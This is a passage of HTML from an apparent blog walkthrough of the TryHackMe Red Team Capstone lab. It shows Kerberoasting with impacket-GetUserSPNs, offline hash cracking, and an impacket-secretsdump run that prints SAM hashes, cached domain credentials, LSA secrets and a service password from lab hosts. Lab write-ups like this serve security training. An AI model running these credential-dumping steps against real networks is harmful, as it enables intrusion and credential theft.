2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">proxychains4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetUserSPNs<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corp.thereserve.loc\/laura.wood:<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Password1@<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-dc-ip<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.113.102<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> config file found: \/etc\/proxychains.conf<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Strict chain  ...  127.0.0.1:1080  ...  10.200.113.102:389  ...  OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ServicePrincipalName<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Name<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">MemberOf<\/span><span style=\"color: #BABED8\">                                                   <\/span><span style=\"color: #C3E88D\">PasswordLastSet<\/span><span style=\"color: #BABED8\">             <\/span><span style=\"color: #C3E88D\">LastLogon<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #C3E88D\">Delegation<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">--------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">-----------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">---------------------------------------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">----------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">cifs\/scvScanning<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">svcScanning<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:07:06.603818<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">cifs\/svcBackups<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">svcBackups<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:05:59.787089<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:42:19.327102<\/span><span style=\"color: #BABED8\">             <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">http\/svcEDR<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">svcEDR<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:06:21.150738<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">http\/svcMonitor<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">svcMonitor<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:06:43.306959<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">mssql\/svcOctober<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">svcOctober<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">CN=Internet<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Access,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:07:45.563346<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-03-30<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">:26:54.115866<\/span><span style=\"color: #BABED8\"> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The output of this will also give us hashes for the above users. We will save the hashes for each user and start cracking them offline.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09112a06&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09112a06\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"725\" data-attachment-id=\"565\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/kerb-hash\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?fit=1024%2C725&amp;ssl=1\" data-orig-size=\"1024,725\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"kerb-hash\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?fit=1024%2C725&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?resize=1024%2C725&#038;ssl=1\" alt=\"\" class=\"wp-image-565\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?w=1024&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?resize=300%2C212&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?resize=768%2C544&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><code>Hashcat<\/code> was able to crack only one hash successfully for the service account <code>svcScanning<\/code>.<\/p>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09112fc7&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09112fc7\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"624\" data-attachment-id=\"496\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206165226\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?fit=1686%2C1028&amp;ssl=1\" data-orig-size=\"1686,1028\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206165226\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?fit=1024%2C624&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=1024%2C624&#038;ssl=1\" alt=\"\" class=\"wp-image-496\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=1024%2C624&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=300%2C183&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=768%2C468&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=1536%2C937&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?w=1686&amp;ssl=1 1686w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using this account, we can RDP into the Server machines. <\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09113587&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09113587\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"499\" data-attachment-id=\"497\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206170041\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?fit=1706%2C831&amp;ssl=1\" data-orig-size=\"1706,831\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206170041\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?fit=1024%2C499&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=1024%2C499&#038;ssl=1\" alt=\"\" class=\"wp-image-497\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=1024%2C499&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=300%2C146&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=768%2C374&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=1536%2C748&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?w=1706&amp;ssl=1 1706w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"30-compromising-the-corpdc-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising the CORPDC<\/mark><\/h2>\n\n\n\n<p>Service accounts have more privileges than normal domain users. With the <code>svcScanning<\/code> account, we can carry out further attacks such as dumping secrets from the AD machines.<\/p>\n\n\n\n<p>For this attack, we will make use of <code>Impacket-secretsdump<\/code> tool. Let&#8217;s try to dump hashes on the <code>Server1<\/code> machine.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ proxychains impacket-secretsdump corp.thereserve.loc\/svcScanning:'Password1!'@10.200.113.31\n[proxychains] config file found: \/etc\/proxychains.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\nImpacket v0.11.0 - Copyright 2023 Fortra\n\n[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.31:445  ...  OK\n[*] Service RemoteRegistry is in stopped state\n[*] Starting service RemoteRegistry\n[*] Target system bootKey: 0x90cf5c2fdcffe9d25ff0ed9b3d14a846\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:e2c7044e93cf7e4d8697582207d6785c:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::\nTHMSetup:1008:aad3b435b51404eeaad3b435b51404ee:d37f688ca5172b5976b714a8b54b40f4:::\nHelpDesk:1009:aad3b435b51404eeaad3b435b51404ee:f6ca2f672e731b37150f0c5fa8cfafff:::\nsshd:1010:aad3b435b51404eeaad3b435b51404ee:48c62694fd5bbca286168e2199f9af49:::\n[*] Dumping cached domain logon information (domain\/username:hash)\nCORP.THERESERVE.LOC\/Administrator:$DCC2$10240#Administrator#b08785ec00370a4f7d02ef8bd9b798ca: (2023-04-01 03:13:47)\nCORP.THERESERVE.LOC\/svcScanning:$DCC2$10240#svcScanning#d53a09b9e4646451ab823c37056a0d6b: (2024-02-06 22:58:50)\n[*] Dumping LSA Secrets\n[*] $MACHINE.ACC \nCORP\\SERVER1$:aes256-cts-hmac-sha1-96:60db0f5bd8abfee643cae3060ed708e3158426f253e2711f9be068245cee19ac\nCORP\\SERVER1$:aes128-cts-hmac-sha1-96:3e61a6a2a9f25ada7f7ebd64a3384a9a\nCORP\\SERVER1$:des-cbc-md5:023dfdfbcd51b6a8\nCORP\\SERVER1$:plain_password_hex:323da71a677b83100ef8a4555d87c9ed4af979b405f786814bdecc168e16f82b86cf247e0b03bbe01c09b9fa98d5866fe4a09d3fd99a98b4543bdb36fbbe742c05b0e9b4f6795313db4f68c33cc6bc2330a1c4d75311ede155b90f11ebe5ff8409989636083928daf72ecd7f807e47b4eea7741d5ac3c4141ffad6e5663a19a1660a562a0aa72031d25f1229eb4a445016b8a8b7614ed559b78ef9334dcf6dd9442a1ff43d7a3b1a99b4d74906f3b99666a4d277190d06bb76c6905a9fdf03d7a1272903fce0f5c1c7ed7cee1a9332123ffff71fc3d1de00db45845270842b4b33415df5b524e6f0bf1beac6bdf2fb2a\nCORP\\SERVER1$:aad3b435b51404eeaad3b435b51404ee:ab478e460aa37786571a4d13497c2f47:::\n[*] DPAPI_SYSTEM \ndpapi_machinekey:0xb4cfb5032a98c1b279c92264915da1fd3d8b1a0d\ndpapi_userkey:0x3cddfc2ba786e51edf1c732a21ffa1f3d19aa382\n[*] NL$KM \n 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f\n 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..\n 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[\n 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...\nNL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2\n[*] _SC_SYNC \nsvcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G\n[*] Cleaning up... \n[*] Stopping service RemoteRegistry\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">proxychains<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-secretsdump<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corp.thereserve.loc\/svcScanning:<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Password1!<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">@10.200.113.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> config file found: \/etc\/proxychains.conf<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span 